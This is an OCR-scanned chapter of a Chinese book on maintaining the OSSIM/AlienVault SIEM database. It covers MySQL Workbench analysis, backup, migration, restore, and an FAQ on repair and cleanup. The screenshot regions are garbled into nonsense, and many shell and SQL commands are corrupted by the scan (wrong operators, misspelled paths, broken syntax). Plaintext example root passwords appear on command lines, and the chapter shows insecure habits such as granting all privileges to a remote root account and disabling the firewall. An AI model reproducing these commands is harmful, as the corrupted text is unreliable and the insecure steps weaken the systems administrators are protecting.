ea 


jetonshgs) 
mgd np exe -defsdisestr lee" Vocne! adnev! Vocale tengitnoper 


图 3-3 多 个 数据 库 导出 


另 一 款 可 视 化 数据 库 分 析 工 具 是 MySQL Monitor， 它 可 通过 Web 方式 访问 ， 使 用 方便 且 
能 详细 地 显示 数据 库 工 作 状况 ， 这 里 省 略 它 的 安装 、 配 置 方法 。 


3.22 ”利用 MySQL Workbench 工具 分 析 数 据 库 

MySQL Workbench 是 一 款 专 为 MySQL 设计 的 E/R 数据 库 建 模 工具 。 可 以 用 MySQL 
Workbench 设计 和 创建 新 的 数据 库 图 示 ， 建 立 数据 库 文档 ， 以 及 进行 复杂 的 MySQL. 迁移 。 它 
分 为 开源 和 商业 化 两 个 版 本 。 可 运行 在 Windows. Linux, Mac 平台 下 ,以 下 操作 实例 在 Windows 


XP 下 讲解 。 


目的 : 利用 Workbench 工具 远程 分 析 OSSIM 数据 库 的 问题 。 


环境 : 


本 机 访问 虚拟 机 中 的 OSSIM 数据 库 。 
本 机 IP 为 192.168.0/24 网 段 。 
虚拟 机 : Vmware Workstation 10。 
VM: OSSIM 网 卡 采用 NAT 模式 。 
OSSIM IP: 192.168.120.77。 

网 关 : 192.168.120.1。 


S 


E 建议 读者 不 要 使 用 汉化 MySQL workbench 程序 ， 它 在 使 用 时 常会 出 现 意 想不到 的 错误 。 | 


(1) 设置 。 在 MySQL 中 进行 如 下 操作 ， 以 便 进行 远程 连接 ， 如 图 3-4 所 示 。 
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图 3-4 修改 权限 


(2) 为 了 调试 方便 ， 先 将 iptables 规则 临时 关闭 。 接 下 来 ， 我 们 在 Windows 上 安装 


Workbench， 开 始 备份 OSSIM 数据 。 首 先 新 建 连接 ， 名 称 为 ossim_db， 


连接 方法 采用 标准 的 


TCP/IP 协议 ， 然 后 输入 OSSIM 主机 的 IP 地址 “192.168.120.77”， 数 据 库 端口 3306， 登 录用 


户 root， 输 入 口令 ， 如 图 3-5 所 示 。 


E vs eC Wor berdi Tw - i 
* 人 


J. Please enter password for the. 
following service: 


3-5 


X HE 


Shortcuts 


MySQL Doc Library 


MYSQL Utilities 


MYSQL Bug Reporter 


Workbench Blogs 
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(3) 系统 显示 导出 数据 库 进 程 ， 如 图 3-6 所 示 ， 大 家 要 留意 导出 路 径 。 


[ER 
(Amen x 
[le I fie Oy Deu Suv Tels Seirtag dy 


a 6361815515 e 


Navigator 


MANAGEMENT 
Q senectus 
È cient Conneions 
AL Virs and Prieger 
E status ana system yamaoles 
d, Data Sport 
d Daa mporteestore 


MSTANCE 


diredersel-ife PET Ral Senrt iesi” a 
ng CI R02 Yer ebat 
Bg ridi ers dut ata ev esito Ye lepers oor -et hócugeooFr user nen db udi -host lB 8 20 7 -pote338 Ad 
oas 2 dursctr t= PCF 62 Vender 
pen 
a Fiter obec Fenna madara cs deis curs etc hacaVincons appaia ecane lengane of -set té purged -OFF crei -ran onc pacist- 1 stet 158,120,77 -port-3305 -defaut 


dient GOLD CR er) rr 
lewat ac Reng maim em dnce firi asiento egg oF e ghd peedOFF totu longae Fori 238 227] -Portman duh 
uscire 54 
P PLD 
Aor riim e tut eir e Wero wr Y. "e QU ITO a! nh ane pete Vires 8 18 127 oo eS dei 
decet 


Led 
IS hore FC 3 Sive rael) 
pend ve tiep es elo user estos iater Sr. -setge eno dive deir -hoste 152 万 -Se 
Stt ICT NUI Sere ed 
MA defauts extre fle "c pserslvincons ggocoralca erc knpiógelZ.f -aetgtdourged-OFT us ~toot -mar _alowed_podet=1G -host= 192. 168, 120.77 -port-J306 -defeuit 
Sen a AT APATI 
tt 

Pnng: emp ea in ts fa c peer rco ota arcere oF et hd purgid -OFF ur eot nac Moved pacatel -+ert=192 168 277 -port=3305 def 
racer etn. V Ste Suum 0 
Ere CUT uma 

em rms dan 


CR 


TE MEES ANCONS araeca er gt cn -erqrsqurgerOF -ugrenot na soved pachete hrs 168.1207] orte US eft 


a [es 


图 3-6 备份 数据 库 
导出 成 功 之 后 ， 接 着 尝试 恢复 数据 库 ， 导 入 数据 库 的 过 程 较 容易 ， 如 图 3-7 所 示 。 


Tha Gai Ye quay Debe fave Tele feine Xp 


Sio ansam x pa © DEC 
m "D B GM 
MANAGEMNT mm 
© setius 
eh QA Data Import 
pav estne DS: [ipee 
pred un 
prem 
人 — — (C ersrdenbeneertid res Doane [res] 
icr Salac Dump Prope Pokie torpor foo can do a sacara recte 
T [LER 
reet ton setconanec ia C Reds pinea rin ir 
a Fieri xoEE 
oc aiemvauk Adobe Scripts. 
Sons ac ADR Tes 
pre dus 
avr desctosatuas gc © irpo: mw laser Preset eben) Danpattabiia 
pessum mE forced shared Flex 
T3077001An iebook2010 
ad Ln z 
一 ELI az Caa 
E toa 


3-7 导入 数据 库 
(4) 分 析 OSSIM 数据 库 关系 (绘制 E-R 图 )。 
选择 Database 菜单 中 “Reverse Engineer” 按 钮 ， 注 意 先 不 急于 连接 数据 库 。 如 图 3-8 所 示 。 
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国 saQL Workbend 
本 mb = E 
File Edit View Query Database Server Toesls Scripting Help 


Ee ee culty E 


Menace Connections 
MANAGEMENT. ci ae atre 

Q sever status Same Tranfer Tired 

È chent Connections CHER 

里 Users and Privileges Edit Type Mappings for Generic Migration [ober 

El statusand System vara — oe Tale Date 

d, Dota Eport 

4 jor tore T 

S Dee Moer mes I 回 optmizer, pne. jevel 


图 3-8 Reverse Engineer 


配置 参数 ， 输 入 主机 卫 地 址 和 端口 ， 如 图 3-9 所 示 。 
EE U E A Y 


Sai saiia S Tase erie Edy I 
ait 


Sr ore ord = søt hon ord rmten mitro 


Cove eod: onderd TCP ~ Madod one to caract io de RONS 


er mos Paeetrir dem ete meer es SOR 


Ve X Hane ot tre ee crm 


图 3-9 配置 主机 IP 和 端口 


继续 选取 “Connectto DBMS” 和 “Retrieve Schema List from Database ”， 再 选择 下 一 步 按 
钮 如 图 3-10 所 示 。 


Connect to DBMS and Fetch Information 


The folowing tasks wll now be executed. Please monitor the execut 
Press Show Logs to see the executon logs. 


加 Correct to DEMS 
S Retrieve Schema Ust from Database 


Executon Completed Successful y 
Fett fared 


3-10 ”连接 数据 库 
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OSSIM 4.8 中 存在 12 个 数据 库 ， 根 据 需 要 选择 一 个 或 多 个 ， 本 实例 中 选择 “avcener”， 如 
图 3-11 所 示 。 


Select Schemas to Reverse Engineer 


本 Select the schemas below you want to indude: 


习 mydb Ej rsozmoua 
M e Pa 
levat 
Tables Pier E alervauit i 
一 asenvaut_asec 
| Add Tabie alert sem 
I avcenter 
Views (te categorzaton 
datawarehouse 
qd NH Vew E myadmin 
Routines (Ot E ocsweb 
一 一 osd 
d Adá Routine 
Routine Groups (0 tem 
© AddGmup 
> Schema Privileges 


> SQL Scripts 
> Model Notes 


图 3-11 选择 数据 库 
然后 选择 目标 引擎 ， 如 图 3-12 所 示 。 


L4 
Add Diagram 
* Physical Schemas 
B ye 


IV] Import MYSQL Table Objects 
3Total Objects, 2 Selected 


Tables Oh [avcenter current remote. avcenter.current _Jocal 
avcenter register 

© Add Table 

cmn LJ 

本 如 ww 
Routines (ten mcm 

+ 
Add Routine 

e Use the + button to excude objects matching wildcards such as *and _ 
Routine Groups 

© Add Group 
> Schema Privileges 
> SQL Scripts 


> Model Notes 
[F] Place imported objects on a diagram 


图 3-12 选择 目标 引擎 
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最 后 一 步 就 是 设置 关联 ， 选 择 好 数据 库 后 按 提 示 操 作 ， 如 图 3-13 所 示 。 


国 Mysal Workben 
f mé < WSQLNodor x EfRDegan > EERDaganl x 
File Edit Vier Arrange Model Datwbsse Tools Seripting Help 


iid san 


| Er nec EDARYS) per secat V/ROUR US PTS 
iss M Uedae VAR (1020) kso 
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图 3-13 查看 数据 库 关联 


分 析 OSSIM 数据 库 设计 的 E-R 模型 并 不 难 ， 只 要 大 家 熟练 掌握 MySQL Workbench 这 款 
工具 的 使 用 即 可 实现 。 


查看 OSSIM 数据 库 表 结 构 


从 OSSIM 数据 库 的 表 结构 ， 大 家 可 以 了 解 资源 的 数据 结构 ， 了 解 OSSIM 数据 库 结 构 对 
于 二 次 开发 的 用 户 、 数 据 库 性 能 调 优 尤为 重要 。 在 作者 博客 
(http://chenguang.blog.51cto.com/350944/1682706/) 中 列 出 了 Alienvault OSSIM 4.8 版 系统 的 
数据 库 结 构 ， 在 更 高 的 OSSIM 版 本 中 数据 库 主 要 结构 依然 不 变 。 

OSSIM 针对 每 一 个 资源 都 有 一 张 表 与 其 对 应 ， 比 如 host、alarm…… 每 张 表 中 都 有 个 id F 
段 ， 比 如 host 表 中 有 hostid 列 ， 资 源 之 间 的 关联 通过 该 ID 实现 。 接 下 来 ， 我 们 讲解 一 下 对 
alienvault 和 alienvault_siem 数据 库 表 的 基本 操作 ， 如 表 3-1 所 示 。 
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MySQL 基本 操作 


大 家 在 维护 OSSIM 时 经 常 需要 对 MySQL 进行 操作 ， 下 面 就 是 笔者 总 结 出 来 的 几 个 常见 
操作 方法 ， 数 据 库 基本 操作 如 下 : 


列 出 所 有 数据 库 : show databases 

选择 数据 库 : use databasename 

列 出 表 : show tables 

显示 表 结 构 : show columns from tablesname 

显示 表 字 段 完整 属性 : show full fields from tablesname 

删除 student. course 数据 库 中 的 abc 数据 表 : rm —f student. course/abc.* 
查看 数据 库 alienvault 中 event 表 的 索引 : show index from event 
显示 一 个 用 户 的 权限 : show grants for user name 

显示 系统 变量 名 称 和 值 : show variables 

显示 系统 正在 运行 的 所 有 进程 : show processlist 

显示 当前 使 用 数据 库 的 每 个 表 信息 : show table status 

显示 服务 器 所 支持 的 权限 信息 : show privileges 

显示 安装 以 后 可 用 的 存储 引擎 和 默认 引擎 : show engines 

仅 显示 数据 库 、 表 、 列 信息 : mysqlshow -uroot -puh4A73WQSr PCI 


其 中 “uh4A73WQSr” 为 管理 员 密 码 ，“PCI” 为 OSSIM 库 名 称 。 
查看 数据 库 alienvault 的 表 空 间 (以 MB 为 单位 )， 要 查找 这 类 信息 ， 可 以 找到 MySQL 中 
的 information schema 表 ， 这 张 表 记录 了 所 有 数据 库 中 表 的 信息 ， 主 要 字段 含义 如 下 : 


TABLE SCHEMA : 数据 库 名 
TABLE NAME: 表 名 
ENGINE: 所 使 用 的 存储 引擎 
TABLES ROWS: 记录 数 
DATA_LENGTH: 数据 大 小 
INDEX LENGTH: 索引 大 小 


有 了 以 上 这 些 基础 知识 ， 我 们 开始 稍 复杂 的 几 项 操作 : 
CD 查看 指定 库 的 索引 大 小 , 例如 数据 库 alienvault 索引 大 小 (以 MB 位 单位 )》 如 图 3-14 


所 示 。 
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ysql> select concat(round(sumCindex length)/(1024*1024),2),'MB' ) AS“Total Inde 
ize’ from information schema.tables where table schema like 'alienuault' ; 


2 


| Total Index Size | 


1 row in set (0.76 sec) 


K 3-14 查看 alienvault 库 索引 大 小 
(2) 查看 指定 库 (alienvault_api) 的 索引 详细 情况 〈 以 GB 位 单位 )， 如 图 3-15 所 示 。 


ysql> select concat(table schema,'.',table name) AS ' Table Name’ ,concat(round(t 

ble rous/1000000,4),'M') AS ’Number of Rows’, concat(round(data length^(1024*10 

[24«1024),4),'G' ) AS“Data Size’, concat(round(index length^(1024*1024*1024),4)," 
3”) AS ' Index Size’ ,concat(round((data length*index length)/(1024*1024*1024),4), 
g 'Total' from information schema.tables where table schema like ’alienvau 


rnt 


1 Table Name | Nunber of Rous | Data Size | Index Size 
1 Total 1 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 —— — — 4----------- 
+ 
1 alienvault_api .celery_job 1 0.0001M 1 0.00006 1 0.00006 
1 0.00006 | 
1 ali ault api.current status 1 0.00007 1 0.0000G 1 0.0000G 
1 0.0000G | 


图 3-15 查看 指定 库 索 引 


OSSIM 系统 迁移 


随 着 部 团 OSSIM 的 深入 ， 迁 移 系 统 的 方法 需要 管理 员 掌 握 ， 有 时 我 们 需要 将 虚拟 机 上 的 
OSSIM 迁移 到 物理 机 , 有 时 需要 将 故障 OSSIM 机 器 的 数据 迁移 到 新 安装 的 机 器 …… 这 些 情况 
dicke n RR 下 文 描述 的 方法 就 是 假设 有 台 发 生 故 障 的 OSSIM 服务 器 ， 需 要 
迁移 数据 到 新 装 的 机 器 上 的 场景 。 


3.5.1 迁移 准备 


首先 在 故障 机 里 保存 重要 信息 : 

(1) 重要 历史 数据 包括 events、alarms、assets、tickets， 以 及 用 户 信 息 和 生成 的 报表 等 。 
对 于 AlienvaultUSM 版 而 言 这 些 重要 数据 存储 在 两 个 数据 库 中 ,MySQL 和 Mongo DB. 
MySQL 储存 events, alarms, assets 信息 ，tickets 用 户 和 权限 ,报表 MongoDB 存储 IDM 

的 历史 数据 。 这 些 都 非常 重要 。 下 面 通过 SSH 远程 登录 到 服务 器 进行 备份 。 


MySQLDatabase Dump 操作 : 


li 
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alienvault:~# mysqldump -p "grep ^pass /etc/ossin/ossim setup.conf | sed 's/pass-//'^ --no-autocommit 
--single-transaction --all-databases | gzip » alienvault-dbs.sql.gz 
alienvault:-£ 


MonogoDatabasesDump 操作 : 


alienvault:~#mongodump -host localhost \\ 生 成 dump 文 件 
alienvault:~#tar cvzf alienvault-mongo.tgz dump \\ 压 缩 dump 文件 


(2) 环境 : 系统 配置 环境 和 插件 等 。 
执行 backup.sh 脚本 : 


alienvault:~# cat backup.sh 

t! /bin/bash 

if [[ ! -f /etc/alienvault-center/alienvault-center-uuid ]]; 

then 

dmidecode -s system-uuid |awk '(print tolower($0)]' »/etc/alienvault-center/alienvault-center-uuid; 
fi 


备份 配置 时 间 比 较 长 ， 执 行 完 以 下 命令 将 生成 alienvault-environment.tgz 3c f: 


alienvault-data.tgz alienvault-dbs.sql.gz alienvault-environment.tgz backup.sh 

alienvault:-4 tar czvf alienvault-environment.tgz /etc/ossim/ /etc/alienvault/ /etc/alienvault-center/ 
/etc/ansible/ /root/.ssh/ /home/avapi/ /home/avserver/ /var/ossec/ /etc/snort/ /etc/suricata/ /etc/na 

gios3/ /etc/openvpn/ /var/cache/openvas/ /var/lib/openvas/ /etc/logrotate.d/ /etc/rsyslog.d/ /etc/apa 

"E /usr/share/alienvault-center/ /etc/nfsen/ /etc/nysql/ /var/ossim/ssl/ /etc/hosts /etc/resolv.con 

£ 


(3) HUE (Raw Data): 包括 Logger. Netflow 以 及 重要 抓 包 数 据 。 备 份 命令 如 下 : 
Alienvault:-$ tar czvf alienvault-data.tgz/var/ossim/logs/var/cache/nfdump/ 


E 不 要 尝试 使 用 克隆 系统 (或 GHOST) 的 方式 来 解决 迁移 问题 。 | 


最 后 通过 安全 方式 (WinSCP、SCP ) 将 保存 在 服务 器 上 的 备份 文件 alienvault-dbs.sql.gz、 
alienvault-mongo.tgz. alienvault-environment.tgz、alienvault-data.tgz 复制 到 目 标 OSSIM 
Server 上 。 


3.5.2 恢复 OSSIM 

当 OSSIM 的 数据 库 意外 受 损 ， 手 动 无 法 修复 ， 此 时 最 简单 的 方法 可 以 通过 OSSIM 终端 
控制 台 进行 数据 库 出 厂 设 置 ， 通 过 ossim-setup 命令 进入 AlienVault 控制 台 ， 菜 单 上 选择 
Maintenance&Troubleshooting 一 Maintain Database 一 Restore database to factory settings。 恢 复出 
厂 设 置 是 在 AlienVault 4.14.2 之 后 ， 新 增加 的 一 个 实用 功能 ， 一 旦 进行 数据 库 初始 化 恢复 ， 那 
么 再 次 登录 Web UI 就 需要 重新 输入 管理 员 密码 , 以 及 再 次 进行 2.5 节 介绍 的 系统 初始 化 工作 ， 
并 要 手动 添加 Sensor, 经 过 这 几 步 复合 操作 之 后 就 生成 了 全 新 的 系统 , 不 过 读者 需要 明白 手动 
恢复 过 程 中 的 关键 步骤 : 
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(1) 停止 所 有 应 用 


在 上 面 第 5 步 中 , IDM 表示 Identiy Management. 身份 认证 管理 。 它 将 发 现 从 同一 个 宿主 
事件 发 送 过 来 的 用 户 身份 相 匹 配 的 信息 。 通 过 /etc/init.d/alienvault_idm start/stop 方式 启动 或 
停止 IDM， 如 果 停止 IDM 服务 ， 那 么 SIEM 将 无 法 填充 安全 事件 。 


(2) 备份 原 ossim_setup.conf 文件 


(3) 数据 库 恢复 


(4) 环境 恢复 
首先 ， 删 除 当前 配置 。 


然后 ， 从 备份 中 恢复 。 

© #tar xvzf alienvault-enviromment.tgz =C / 0000 
接着 ， 将 Alienvault 配置 文件 复制 到 /etc/ossim/ 目 录 下 。 

(cp /root/ossim setup.conf last /etc/ossin/ 


最 后 ， 执 行 下 面 命令 更 新 文件 权限 。 
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alienvault:~# cat /root/permission.sh 
#!/bin/bash 
for i in “cat /root/file list | cut -f2 -d " " |sort -u `; 
do user-'echo $i | cut -f1 -d "/"'; 
group-'echo $i |cut -f2 -d "/""; 
chown Suser:$group ^grep Si /root/file list |cut -f6 -d " " |xargs'; 
done 
#ulimit -s 8192 


fcd root 


(5) RAW 数据 恢复 
解压 alienvault-data.tgz 到 根 目录 。 


#tar xvzf alienvault-data.tgz -C / 


执行 下 面 命令 更 新 文件 权限 。 


#tar tvzf alienvault-data.tgz | tr -s ' ' > file list 
#ulimit -s 65536 
#cd / 


alienvault:-£ cat /root/permission.sh 
f!/bin/bash 
for i in "cat /root/file list | cut -f2 -d " " |sort -u `; 
do user-'echo $i | cut -f1 -d "/” 
group-'echo $i |cut -f2 -d "/"`; 
chown $user:$group "grep $i /root/file list |cut -f6 -d " " |xargs'; 
done 
fulimit -s 8192 


C6) 启动 服务 


#ossim-reconfig -c -v -d 


至 此 ， 将 把 故障 OSSIM 服务 器 的 数据 备份 到 新 OSSIM 服务 器 上 并 启动 服务 ， 由 新 机 器 


接管 原来 的 旧 服 务 器 。 


OSSIM 数据 库 常 见 问题 解答 


1. 24 OSSIM 4 系统 数据 库 发 生 损 坏 时 ， 如 何 重建 数据 库 
COD 手动 清理 ， 编 辑 /etc/ossim/ossim_setup.conf 文件 ， 将 其 中 rebuild database-no KUR 


yeso 


(2) 运行 如 下 命令 : 


#ossim-reconfig -c 


(3) 再 次 将 /etc/ossim/ossim_setup.conf 文件 中 rebuild_database=yes 改 成 no， 完成 自动 方 


式 ， 在 命令 行 下 运行 : 


第 3 章 OSSIM 数据 库 概 述 


#alienvault-reconfig --rebuild db 


2. 如 何 查询 OSSIM 数据 库 的 host 开头 的 表 


#ossim-db 
mysql»show tables like "'host$'; 


通过 举一反三 大 家 可 以 找到 更 多 感 兴趣 的 内 容 。 
3. 如 何 备份 OSSIM 的 SIEM 数据 库 
OSSIM 4.6 以 上 系统 的 位 置 在 Configuration Administration Main— backup 下 。 在 Backup 
栏 里 就 可 以 按 日 期 恢复 。 当 然 也 可 以 手工 选择 使 用 AutoMySQLBackup 工具 
Chttp;//sourceforge.net/projects/automysglbackup/) 来 备份 ， 效 果 也 不 错 。 
4. 如 何 查看 MySQL 数据 库 信息 


要 查看 MySQL 数据 库 总 大 小 、 有 多 少 个 表 ， 以 及 多 少 条 数据 库 信 息 可 以 登录 
phpMyAdmin， 然 后 单 击 左 侧 的 数据 库 ， 在 右 下 方 即 可 显示 相关 信息 。 在 MySQL 环境 下 使 用 
如 下 命令 : 

SELECT sum(DATA LENGTH)+sum(INDEX LENGTH) FROM information schema . TABLES 
where TABLE_SCHEMA=' 数 据 库 名 ' 

另外 ， 使 用 如 下 命令 也 能 查看 : 

#du -h /var/lib/mysql 


5. 如 何 查看 OSSIM 系统 的 SIEM 数据 库 备份 情况 


SIEM 是 其 中 非常 重要 的 数据 库 ， 系 统 会 备份 5 天 ， 我 们 可 以 在 Configuration 一 
Administration 一 Main 一 Backup 中 查看 备份 策略 ， 备 份 文件 可 以 到 /var/lib/ossim/backup 目录 下 
查看 。 如 果 是 远程 备份 的 话 ， 我 们 需要 将 这 个 目录 下 格式 为 ossim-backup- 日 期 .sql.gz 的 文件 ， 
通过 备份 到 远程 服务 器 上 妥善 保存 。 在 备份 中 有 更 多 的 细节 大 家 可 以 参考 
/usr/share/ossim_framework/ossimframework/ 目 录 下 的 Backup.py 脚本 。 


a 如 果 不 小 心 单 击 Configuration— Administration Backup T # "Clean SIEM Database" , % 

| 统 这 时 会 删除 SIEM HE, ded XO DU PAA ER Events by Sensor/Data Source 有 
X SIEM 的 信息 。 所 以 大 家 一 定 要 备份 好 该 日 志文 件 , 防止 意外 发 生 。 而 Analysis Alarm 
信息 是 保存 在 alienvault 数据 库 下 的 alarm 表 中 ， 和 SIEM 日 志 无 关 ， 但 我 们 也 要 学 会 如 
何 保存 。 


6. 如 何 终止 OSSIM 数据 库 的 僵尸 进程 
当 遇 到 数据 库 的 僵尸 进程 时 ， 首 先 采用 show processlist 查看 进程 : 
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mysql> show processlist; 
jai 
E 


| event scheduler | Lccalno: 
| 23664 | roo | lecalhost:4" 
| 23665 | root | Lccalhos! 
| 23666 | root 1 localhos' 
| 23678 | root 1 localhost: 47702 
| 23711 | root 1 localhost: 47763 
| 23714 | root 1 localhost: 47766 
| 23715 | root | localhost: 47767 
| 23717 | root | localhost: 41769 
| 23718 | root 
| 23720 | root 
1 23742 | root 
| 26558 | root 
| 78738 | root 
| 78550 | root 


1 78576 | 
ge a 
16 rows in set (0.00 sec) 


然后 用 Kill 进程 id 的 方法 杀 死 进程 。 


7. 如 果 负 载 过 大 ， 在 OSSIM 系统 中 出 现 “MySQL :ERROR 1040:Too many 
connections” 情 况 如 何 处 理 

如 果 出 现 以 上 报错 信息 , 说 明 访 问 量 比较 高 , 一 种 方法 就 是 用 多 个 服务 器 分 摊 负 载 ， 另 
种 临时 救急 的 方法 是 ， 修 改 MySQL. 配置 文件 /etc/mysql/my.conf 中 的 max connections f&, X 
认为 100 可 以 修改 成 256。 重启 服务 后 ， 再 继续 观察 。 可 以 使 用 下 面 语句 查看 服务 器 响应 的 最 
大 连接 数 : 


mysql» show global status like 'Max used connections'; 


+---------------------- 4------- * 
| Variable nane | Value | 
+---------------------- 4------- * 
| Max used connections | 26 1 
+---------------------- 十 ------- 十 


1 row in set (0.00 sec) 


若 将 max connections = 3000 或 更 大 值 ， 其 实 是 无 效 的 ，MySQL 最 大 支持 1024。 
新 装 的 OSSM 系统 默认 只 有 1024， 当 负载 大 时 ， 我 们 需要 修改 配置 ， 在 
letc/security/limits.conf 文件 中 设置 最 大 打开 文件 数 ， 然 后 添加 以 下 两 行 : 


root soft nofile 65535 
root hard nofile 65535 


8. 如 何 远 程 导出 OSSIM 数据 库 表 结 构 

命令 行 下 具体 用 法 如 下 : 

mysqldump -u 用 户 名 -p 密码 -d 数据 库 名 表 名 > 脚本 名 ; 

举例 : 服务 器 IP: 192.168.150.100， 客 户 机 为 192.168.150.21。 首 先 在 MySQL 数据 库 中 
设置 权限 : 


mysql>grant all privileges on *.* to 'root'@'192.168.150.21' identified by 
'a1234567b' with grant option; 
mysql»flush privileges; 


然后 在 客户 端 输入 命令 : 


#mysqldump -h 192.168.150.100 -u root -pal234567b alienvault »dumpl.sql 
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如 果 只 需要 导出 单个 数据 表 结 构 而 不 用 包含 数据 ， 输 入 以 下 命令 : 
#mysqldump -h 192.168.150.100 -u root -pal234567b -d alienvault »dump2.sql 


备份 alienvault 数据 库 下 的 vuln. nessus servers 表 的 数据 结构 和 数据 : 


#mysqldump -h 192.168.150.100 -u root -pal234567b alienvault 
vuln nessus servers »dump3.sql 


9. OSSIM 系统 出 现 acid 表 错 误 时 如 何 处 理 


在 使 用 过 程 中 ，OSSIM 数据 库 中 的 表 可 能 发 生 故 障 ， 尤 其 在 非法 关机 之 后 这 种 故障 的 概 
率 更 大 ， 如 图 3-16 中 展示 了 一 种 故障 现象 ， 下 面 讲 讲 如 何 处 理 。 


SECURITY 


TOP 10 PROMISCUOUS HOSTS 


Incorrect key file for table 'acid event"; try to repair it 


No data available yet 


图 3-16 acid event 表 故 障 


首先 ， 尝 试 使 用 ossim-repair-tables 命令 进行 修复 ， 如 果 无 效 ， 可 以 采用 MySQL 中 的 修复 
数据 库 工 具 mysqlcheck， 它 可 以 不 需要 停止 服务 器 来 检查 和 修复 表 ， 方 法 如 下 : 

首先 需要 知道 数据 库 的 root 密码 。 

#cat /etc/ossim/ossim setup.conf|grep pass 

假设 密码 为 “BiUGe4N5uD”， 下 面 接着 操作 。 

#mysqlcheck -o -u root -pBiUGe4N5uD -A \“-A” 表 示 对 所 有 库 进 行 检 查 


10. 能 否 修 改 OSSIM 系统 中 MySQL 数据 库 密码 


对 于 这 个 问题 ,初学 者 最 好 不 要 修改 ， 因 为 密码 是 系统 通过 算法 随机 设置 ， 相 对 较 安 全 ， 
最 关键 的 问题 是 数据 库 密码 在 下 列 文件 中 都 要 调用 : 


/etc/apache2/conf.d/ocsinventory.conf 
/etc/ocsinventory/dbconfig.inc.php 
/etc/ossim/idm/config.xml 
/etc/ossim/ossim setup.conf 
/etc/ossim/server/config.xml 
/etc/ossim/agent/config.cfg 
/etc/ossim/framework/ossim.conf 
/etc/acidbase/databse.php 
/etc/acidbase/base conf.php 


除非 能 将 全 部 涉及 的 文件 都 修改 完成 ， 否 则 会 出 现 无 法 连接 数据 库 的 情况 发 生 。 
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11. 意外 中 断 数 据 库 写 操作 会 对 数据 库 的 表 造 成 损坏 ， 如 何 检查 表 呢 


有 时 候 升级 过 程 中 系统 会 无 法 响应 ， 可 以 使 用 到 ^ 等 命令 终止 升级 ， 这 时 很 有 可 能 会 对 
数据 库 的 表 造 成 损坏 ， 为 了 检查 /修复 MyISAM 表 (MYI 和 .MYD)， 应 该 使 用 myisamchk Sz 


用 程序 。myisamchk 命令 运行 结果 如 图 3-17 所 示 


#myisamchk -e *.MYI 


图 3-17 检查 表 


还 有 一 种 情况 ， 在 Web UI 中 遇 到 “*Check 
needing tables.” 错 误 提 示 ， 我 们 修复 表 之 后 方 可 

12. 如 何 清理 OSSIM 数据 库 

很 多 情况 下 《例如 分 区 不 合理 ， 数 据 量 过 大 
库 会 变 得 非常 大 ， 几 十 GB 甚至 更 大 ， 设 置 需 删 


ing for corrupt not cleanly closed and upgrade 


排除 错误 。 


等 情况 )，OSSIM 运行 过 一 段 时 间 ， 一 些 数据 
除数 据 库 的 一 些 内 容 以 腾 出 空间 ， 当 用 户 删 除 


数据 时 ，MySQL 并 不 会 回收 ， 被 已 删除 的 数据 占据 的 存储 空间 ， 以 及 索引 位 ， 都 空 在 那里 等 
待 新 的 数据 来 弥补 这 个 空缺 , 如 果 和 暂时 没有 数据 来 填补 这 个 空缺 , 那 就 太 浪费 资源 了 ,表面 上 


看 这 个 数据 库 文件 的 容量 依然 没有 减少 , 对 于 写 
tablename。 


清理 数据 库 的 几 个 步骤 如 下 : 


LASER Je, 要 定期 进行 OPTIMIZE TABLE 


(1) 停止 ossim-framework、ossim-server 以 及 ossim-agent 服务 。 
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(2) 手动 备份 数据 库 。 

>mysqldump (-u -h -p...) --all-databases > all databases 2013-11-29 1.sql | 
(3) 停止 MySQL 服务 。 

(  Pservice mysql stop 000000000000 
(4) 删除 现 有 数据 库 或 者 简单 地 移动 它们 也 可 以 保存 数据 库 文件 。 


C5) 开始 MySQL 服务 。 


(6) 从 备份 中 创建 新 数据 库 文件 。 


CD 重启 系统 。 


Eo CNN 
M 


在 OSSIM 中 如 果 没 有 npe 文件 ， 需 要 使 用 aptinstall nagios-nrpe* 来 安装 ， 然 后 在 
/usr/sbin/nrgp 中 找到 。 


13. 如 何 用 xtrabackup 备份 OSSIM 数据 库 


Xtrabackup 是 percona 公司 的 开源 项 目 ， 用 来 实现 类 似 innodb 官方 的 热 备份 工具 InnoDB. 
Hot Backup 的 功能 ， 能 够 迅速 地 备份 与 恢复 MySQL 数据 库 。Xtrabackup 中 包含 两 个 工具 : 


(1) xtrabackup 是 用 于 热 备份 innodb、xtradb 表 中 的 数据 工具 ， 不 能 备份 其 他 类 型 的 表 ， 
也 不 能 备份 数据 表 结 构 。 
(2) innobackupex 是 将 xtrabackup 进行 封装 的 Perl 脚本 ,提供 了 备份 myisam 表 的 能 力 。 
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于 innobackupex 的 功能 更 为 全 面 和 完善 ， 故 本 文 以 innobackupex 作为 基础 进行 描述 。 
下 面 介绍 xtrabackup 的 全 备份 、 增 量 备份 与 恢复 的 方法 用 percona xtrabackup 备份 OSSIM 数 


图 3-18 ”安装 xtrabackup 


首先 ， 开 始 初始 化 配置 ， 如 图 3-19 所 示 。 
使 用 如 下 命令 : 


innobackupex --user-root --password-xxxxxx /backup 


alhost —port-3 


图 3-19 开始 备份 
经 过 一 段 时 间 等 待 ， 备 份 完成 ， 如 图 3-20 所 示 。 
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word=jITe1YxAQB /backup/ 


图 3-20 备份 完成 
我 们 的 备份 工作 还 没 结 束 ， 下 面 需要 做 统一 检查 ， 如 图 3-21 所 示 。 


图 3-21 备份 数据 库 并 检查 
接 下 来 ， 模 拟 数据 丢失 ， 我 们 先 手 动 删除 alienvault 库 ， 如 图 3-22 所 示 。 


图 3-22 删除 alienvault 


打开 Web U1， 然后 开始 恢复 数据 : 
#innobackupex --copy-back /backup/2014-1-19/ 


记得 将 目录 属性 修改 为 mysql.mysql: 
chown mysql:mysql -R < 目录 >。 


在 OSSIM 可 以 直接 使 用 innotop 命令 : 


#wget http://innotop.googlecode.com/files/innotop-1.9.1.tar.gz 


ca 在 OSSIM 可 以 直接 使 用 innotop 命令 。 | 


14. 如 何 快 速 清除 SIEM 数据 库 
可 在 Web UI 中 选择 Configuration 一 Administration 一 Backup 下 的 “Clear Siem Database" 
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按钮 快速 清除 SIEM 数据 库 。 


15. 如 何 记录 OSSIM 数据 库 的 执行 过 程 
通过 MySQL 打开 日 志 功能 方法 如 下 : 


#vi /etc/mysq/my.cfg 


在 Logging and Replication 选项 (CK £j 98 53 行 的 位 置 ) 下 方 ， 启 用 
log=/var/log/mysql/mysql.log。 

